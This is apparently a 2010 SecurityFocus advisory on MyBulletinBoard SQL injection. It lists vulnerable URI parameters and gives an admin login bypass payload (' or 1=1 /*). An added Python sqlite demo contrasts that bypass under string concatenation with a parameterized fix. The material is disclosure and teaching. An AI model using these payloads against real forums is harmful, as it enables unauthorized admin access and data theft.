MyBulletinBoard Multiple SQL Injection Vulnerabilities

No exploit is required.

The following proof-of-concept URIs are available:
http://www.example.com/member.php?action=login : username='[SQL INJECTION]
http://www.example.com/polls.php?action=newpoll&tid=1&polloptions='[SQL INJECTION]
http://www.example.com/search.php?action='[SQL Injection]
http://www.example.com/member.php?action='[SQL Injection]

The following proof of concept demonstrates the vulnerability in admin/index.php:
Username: ' or 1=1 /*
Password: blank
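
The login bypass above, reproduced next to a parameterized query as an added example (not code from the advisory or from MyBulletinBoard). The query shape, the table and column names and the sample rows are assumptions, and Python's sqlite3 stands in for the PHP/MySQL stack the product runs on.

```python
import sqlite3

def make_db():
    """Build an in-memory table with constructed sample rows (names assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE adminusers ("
               "uid INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    db.executemany(
        "INSERT INTO adminusers (username, password_hash) VALUES (?, ?)",
        [("admin", "constructed-hash-1"), ("o'brien", "constructed-hash-2")])
    return db

def login_concatenated(db, username, password_hash):
    """Assumed vulnerable pattern: request values pasted into the SQL text."""
    sql = ("SELECT uid FROM adminusers WHERE username='" + username +
           "' AND password_hash='" + password_hash + "'")
    try:
        return db.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # a stray quote in the input broke the statement

def login_parameterized(db, username, password_hash):
    """Hardened form: values are bound as data and never parsed as SQL."""
    sql = "SELECT uid FROM adminusers WHERE username=? AND password_hash=?"
    return db.execute(sql, (username, password_hash)).fetchone()

if __name__ == "__main__":
    db = make_db()
    poc_user, poc_pass = "' or 1=1 /*", ""  # the values listed in the advisory
    # Concatenated: the quote closes the string, "or 1=1" matches every row and
    # "/*" comments out the password test, so a row comes back with no password.
    print("concatenated, PoC input:  ", login_concatenated(db, poc_user, poc_pass))
    # Parameterized: the same text is compared as a literal username; no match.
    print("parameterized, PoC input: ", login_parameterized(db, poc_user, poc_pass))
    # A legitimate name containing a quote only works in the bound form.
    print("concatenated, o'brien:    ",
          login_concatenated(db, "o'brien", "constructed-hash-2"))
    print("parameterized, o'brien:   ",
          login_parameterized(db, "o'brien", "constructed-hash-2"))
```

The same binding applies to the other parameters the advisory lists (action, polloptions), since each reaches a query the same way under this assumption.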


 

Copyright 2010, SecurityFocus